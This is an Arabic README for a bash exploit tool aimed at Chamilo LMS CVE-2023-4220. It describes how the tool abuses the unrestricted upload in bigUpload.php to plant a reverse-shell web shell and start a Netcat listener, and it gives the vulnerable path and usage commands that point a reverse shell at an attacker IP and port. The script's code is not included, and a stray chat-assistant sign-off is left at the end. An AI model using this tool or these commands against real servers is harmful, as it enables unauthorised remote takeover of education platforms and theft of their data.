
استغلال Refurbish لـ Chamilo LMS CVE-2023-4220 مكتوب بلغة bash
يستغل هذا السكريبت ثغرة تنفيذ الأوامر عن بُعد (RCE) في Chamilo LMS الإصدارات ≤ v1.11.24. توجد الثغرة (CVE-2023-4220) بسبب وظيفة رفع الملفات غير المقيدة في ميزة bigUpload.php في Chamilo LMS، مما يسمح للمهاجمين برفع ملفات عشوائية (مثل القذائف الويب) وتنفيذها، مما يؤدي إلى تنفيذ أوامر كامل عن بُعد على الخادم.
تم تحسين هذا السكريبت بواسطة Divine Clown لتبسيط عملية الاستغلال، حيث يقوم تلقائيًا بإنشاء ملف قذيفة عكسية، ورفعه إلى الهدف، وتشغيل مستمع لمنح المهاجم وصولًا مباشرًا إلى القذيفة.
/main/inc/lib/javascript/bigupload/inc/bigUpload.phpbigUpload.php../CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>
-i <attacker_ip>: عنوان IP للمهاجم للقذيفة العكسية.-p <port>: المنفذ الذي سيتم تشغيل مستمع Netcat عليه.-h <host_link>: الرابط الكامل لمثيل Chamilo LMS الضعيف../CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
هذه الأداة مخصصة فقط للأغراض التعليمية وبيئات الاختبار حيث لديك إذن صريح لاستغلال الثغرات. الوصول غير المصرح به إلى الأنظمة غير قانوني وقد يؤدي إلى تهم جنائية. لن يتحمل المؤلفون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا السكريبت.
لا تتردد في تعديل ملف README أكثر إذا كنت ترغب في تضمين أي معلومات إضافية أو تنسيق! أخبرني إذا كنت بحاجة إلى أي شيء آخر.